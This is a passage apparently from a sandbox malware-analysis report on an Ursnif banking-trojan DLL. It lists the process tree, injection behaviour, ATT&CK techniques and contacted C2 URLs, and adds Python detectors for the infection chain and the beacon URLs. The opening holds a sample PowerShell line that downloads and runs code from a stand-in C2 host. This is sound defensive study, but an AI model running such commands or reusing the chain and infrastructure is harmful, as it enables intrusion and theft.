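SAMPLE_URLSRETURN = b"$u='http://example.invalid/c2';iex (New-Object Net.WebClient).DownloadString($u)"

if __name__ == "__main__":
    print(find_chains(SAMPLE_EVENTS))
    print(triage_payload(SAMPLE_URLSRETURN))
```

Matching on the shared GUID subkey rather than on the alias names is deliberate: the aliases (einkftwfr, ulhulxq, egwasf, ...) change per run, while both stages must read the same key for the loader to work.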
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D21BC cpuid
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B0799A CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D414A GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D5A5A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: the same memory dumps and process memory spaces listed under "Stealing of Sensitive Information" above (00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp through powershell.exe PID: 6944).

            Mitre Att&ck Matrix

            Techniques are listed per tactic column; a number in square brackets is the count that was attached to that cell in the original matrix.

            Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: Windows Management Instrumentation [2]; Native API [3]; Command and Scripting Interpreter [1]; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
            Persistence: DLL Side-Loading [1]; Valid Accounts [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
            Privilege Escalation: DLL Side-Loading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Process Injection [412]; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
            Defense Evasion: Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Virtualization/Sandbox Evasion [31]; Process Injection [412]; Regsvr32 [1]; Rundll32 [1]
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [3]; System Information Discovery [25]; Query Registry [1]; Security Software Discovery [11]; Virtualization/Sandbox Evasion [31]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [1]
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
            Collection: Archive Collected Data [11]; Email Collection [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
            Command and Control: Ingress Tool Transfer [3]; Encrypted Channel [2]; Non-Application Layer Protocol [3]; Application Layer Protocol [3]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Data Encrypted for Impact [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

            Behavior Graph

            Behavior Graph ID: 555803, Sample: status.dll, Startdate: 19/01/2022, Architecture: WINDOWS, Score: 100

            The interactive graph did not survive extraction; the process tree, network contacts, signatures and dropped files it encoded are listed below. Numbers in brackets are the graph's own node IDs and "2 other processes" is the graph's own collapsed node.

            DNS names resolved in the sample context: myip.opendns.com, 222.222.67.208.in-addr.arpa
            Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for submitted file; Yara detected Ursnif; 5 other signatures

            loaddll32.exe [12] - Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
              regsvr32.exe [17] - contacts 192.168.2.1; Writes or reads registry keys via WMI; Writes registry values via WMI
                mshta.exe [35]
                  powershell.exe [46]
                    csc.exe [62] - drops C:\Users\user\AppData\Local\...\yycrjy0w.dll (PE32)
                      cvtres.exe [78]
                    conhost.exe [65]
              rundll32.exe [21] - Writes to foreign memory regions
                mshta.exe [37]
                  powershell.exe [49] - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
                    csc.exe [67] - drops C:\Users\user\AppData\Local\...\5nzflxas.dll (PE32)
                      cvtres.exe [80]
                    csc.exe [69] - drops C:\Users\user\AppData\Local\...\11mxocay.dll (PE32)
                    conhost.exe [71]
                control.exe [39]
                  rundll32.exe [51]
              cmd.exe [23]
                rundll32.exe [41] - Writes registry values via WMI
                  mshta.exe [53]
                    powershell.exe [73] - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
                      csc.exe [82] - drops C:\Users\user\AppData\Local\...\fyriofhk.dll (PE32)
                        cvtres.exe [89]
                      csc.exe [85] - drops C:\Users\user\AppData\Local\...\mrf10rqm.dll (PE32)
                      conhost.exe [87]
              2 other processes [31]
                powershell.exe [44] - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
                  csc.exe [55] - drops C:\Users\user\AppData\Local\...\eutk2hxp.dll (PE32)
                    cvtres.exe [76]
                  csc.exe [58] - drops C:\Users\user\AppData\Local\...\babtdr3v.dll (PE32)
                  conhost.exe [60]
            iexplore.exe [15]
              iexplore.exe [25] - contacts museumistat.bar (31.41.44.3, ports 49748, 49749, 49750; ASRELINKRU, Russian Federation)
              iexplore.exe [27]
              iexplore.exe [29]
              2 other processes [33]
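The chain the behavior graph records (rundll32 or regsvr32 spawning mshta.exe, mshta.exe spawning powershell.exe, powershell.exe compiling through csc.exe and cvtres.exe, plus the rundll32 call-by-ordinal the Sigma rule flags) is what a detection engineer wants to match in endpoint telemetry. The Python below is an added example written for this page, not Joe Sandbox code and not the Sigma rules themselves: it walks process-creation records shaped like Sysmon Event ID 1 (only ProcessId, ParentProcessId, Image and CommandLine are assumed) and reports which parent/child pairs match. The sample events, paths and command lines are constructed to mirror the graph and are not taken from the report.

```python
"""Flag the rundll32 -> mshta -> powershell -> csc.exe -> cvtres.exe chain from the behavior graph.

Records mimic Sysmon Event ID 1 (process creation) fields. The event list below is
constructed for this example and is not taken from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


# (rule name, allowed parent basenames or None, child basenames, command-line pattern or None)
RULES = [
    ("mshta spawning windows shell", {"mshta.exe"}, {"powershell.exe", "pwsh.exe", "cmd.exe"}, None),
    ("rundll32/regsvr32/control spawning mshta", {"rundll32.exe", "regsvr32.exe", "control.exe"}, {"mshta.exe"}, None),
    ("powershell compiling code at runtime", {"powershell.exe", "pwsh.exe"}, {"csc.exe"}, None),
    ("rundll32 export called by ordinal", None, {"rundll32.exe"}, re.compile(r",\s*#\d+")),
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (rule name, pid) for every process-creation event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        for name, parents, children, rx in RULES:
            if basename(e.image) not in children:
                continue
            if parents is not None and (parent is None or basename(parent.image) not in parents):
                continue
            if rx is not None and not rx.search(e.cmdline):
                continue
            hits.append((name, e.pid))
    return hits


def chain(events, pid):
    """Ancestry of pid as image basenames, root first (stops at unknown or cyclic parents)."""
    by_pid = {e.pid: e for e in events}
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names[::-1]


# Constructed sample: the infection chain next to two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    Proc(100, 1, r"C:\Windows\SysWOW64\loaddll32.exe", r"loaddll32.exe C:\Users\user\Desktop\status.dll"),
    Proc(101, 100, r"C:\Windows\SysWOW64\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\status.dll,#1"),
    Proc(102, 101, r"C:\Windows\SysWOW64\mshta.exe", "mshta.exe about:<script>...</script>"),
    Proc(103, 102, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden -ep bypass ..."),
    Proc(104, 103, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", "csc.exe /noconfig ..."),
    Proc(105, 104, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe", "cvtres.exe /NOLOGO ..."),
    Proc(200, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    Proc(202, 200, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    Proc(203, 202, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "csc.exe /noconfig ..."),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}, chain {' -> '.join(chain(SAMPLE_EVENTS, pid))}")
```

Parent/child pairs are checked against the immediate parent only; `chain` gives the full ancestry so an analyst sees the loaddll32 -> rundll32 -> mshta -> powershell -> csc -> cvtres path on one line. The benign cases matter as much as the hits: PowerShell started from explorer.exe and csc.exe started by Visual Studio are deliberately in the sample and produce no finding.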

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            status.dll | 23% | ReversingLabs | Win32.Trojan.Ursnif
            status.dll | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.2.rundll32.exe.4aa0000.1.unpack | 100% | Avira | HEUR/AGEN.1108158
            1.2.loaddll32.exe.17d0000.1.unpack | 100% | Avira | HEUR/AGEN.1108158
            4.2.regsvr32.exe.2d40000.1.unpack | 100% | Avira | HEUR/AGEN.1108158
            6.2.rundll32.exe.ac0000.1.unpack | 100% | Avira | HEUR/AGEN.1108158

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8 | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk | 0% | Avira URL Cloud | safe
            http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
            http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk | 0% | Avira URL Cloud | safe
            http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
            http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb | 0% | Avira URL Cloud | safe
            http://museumistat.bar/drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk | 0% | Avira URL Cloud | safe
            http://museumistat.bar/favicon.ico | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  museumistat.bar | 31.41.44.3 | true | false | - | high
                  myip.opendns.com | 102.129.143.42 | true | false | - | high
                  222.222.67.208.in-addr.arpa | unknown | unknown | false | - | high

                  Note: 222.222.67.208.in-addr.arpa is the reverse-lookup name for 208.67.222.222, the OpenDNS resolver; the report also whitelists resolver1.opendns.com. A lookup of myip.opendns.com against that resolver is the common way to learn the host's public IP address, so these two names belong together rather than to the C2 infrastructure.

                  Contacted URLs

                  Name | Malicious | Antivirus Detection | Reputation
                  http://museumistat.bar/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk | true | Avira URL Cloud: safe | unknown
                  http://museumistat.bar/favicon.ico | true | Avira URL Cloud: safe | unknown
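Every museumistat.bar request in the table has the same shape: a fixed first directory, a long run of path segments of base64-looking text in which "+" and "/" appear as "_2B" and "_2F", and a short file name with a ".jlk" extension; in several entries the token even straddles a slash ("...cfGGvFKVJ_/2Fi2..."). The Python below is an added example for this page, not Joe Sandbox or Avira logic: it scores a URL on those traits, rebuilds the base64 text across the segments, and checks that the result decodes. The thresholds (six segments, average segment length eight, three of four indicators) are assumptions chosen here; two URLs are copied from the table above and the benign comparison URLs are constructed.

```python
"""Heuristics for the ISFB-style beacon URLs in the Contacted URLs table.

Shape seen in the report: http://<host>/drew/<many path segments>/<name>.jlk, where the
path carries a base64 string split across segments with '+' and '/' rewritten as '_2B'
and '_2F'. Thresholds below are example values chosen for this page, not vendor logic.
"""
import base64
import re
from urllib.parse import urlsplit

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")
TOKEN = re.compile(r"_2[BF]")


def _segments(url):
    return [s for s in urlsplit(url).path.split("/") if s]


def _joined(segs):
    """Join path segments into one string, dropping the extension of the last one.

    Joining first matters: in several listed URLs the token straddles a slash
    ('...KVJ_/2Fi2...'), so substitution must happen after the join.
    """
    body = list(segs)
    body[-1] = body[-1].rsplit(".", 1)[0]
    return "".join(body)


def normalize_payload(url):
    """Base64 text the beacon spreads over the path (leading directory removed)."""
    segs = _segments(url)
    if len(segs) < 2:
        return ""
    return _joined(segs[1:]).replace("_2B", "+").replace("_2F", "/")


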